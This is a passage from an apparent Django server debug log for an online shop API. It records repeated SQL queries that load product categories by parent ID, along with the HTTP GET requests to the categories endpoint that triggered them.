"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:05:55,712 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:05:55,714 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:05:55,717 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:05:55,719 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:05:55,721 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:05:55,724 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:05:55,727 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:05:55] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:06:27,930 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:06:27,937 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:06:27,941 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:06:27,944 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:06:27,947 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:06:27,950 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:06:27,955 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:06:27,960 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:06:27,964 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:06:27,970 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:06:27,974 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:06:27,978 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:06:27,982 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:06:27,987 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:06:27,993 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:06:27,997 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:06:28,001 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:06:28,005 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:06:28,009 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:06:28,015 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:06:28,019 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:06:28,023 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:06:28,028 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:06:28,032 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:06:28,036 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:06:28,042 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:06:28,046 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:06:28,050 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:06:28,054 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:06:28,058 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:06:28,064 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:06:28,068 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:06:28,072 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:06:28,076 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:06:28,080 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:06:28,087 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:06:28,091 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:06:28,095 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:06:28,099 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:06:28,103 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:06:28,107 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:06:28,113 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:06:28,117 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:06:28,121 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:06:28,126 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:06:28,130 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:06:28] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:06:28,225 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 06:06:28,230 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [20/Dec/2019 06:06:28] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-20 06:06:35,198 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:06:35,206 utils 4252 140031503103744 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 06:06:35,211 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:06:35,216 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:06:35,218 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:06:35,222 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [20/Dec/2019 06:06:35] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-20 06:06:35,227 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:06:35,230 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:06:35,235 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:06:35,239 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:06:35,243 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:06:35,249 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:06:35,253 utils 4252 140031492613888 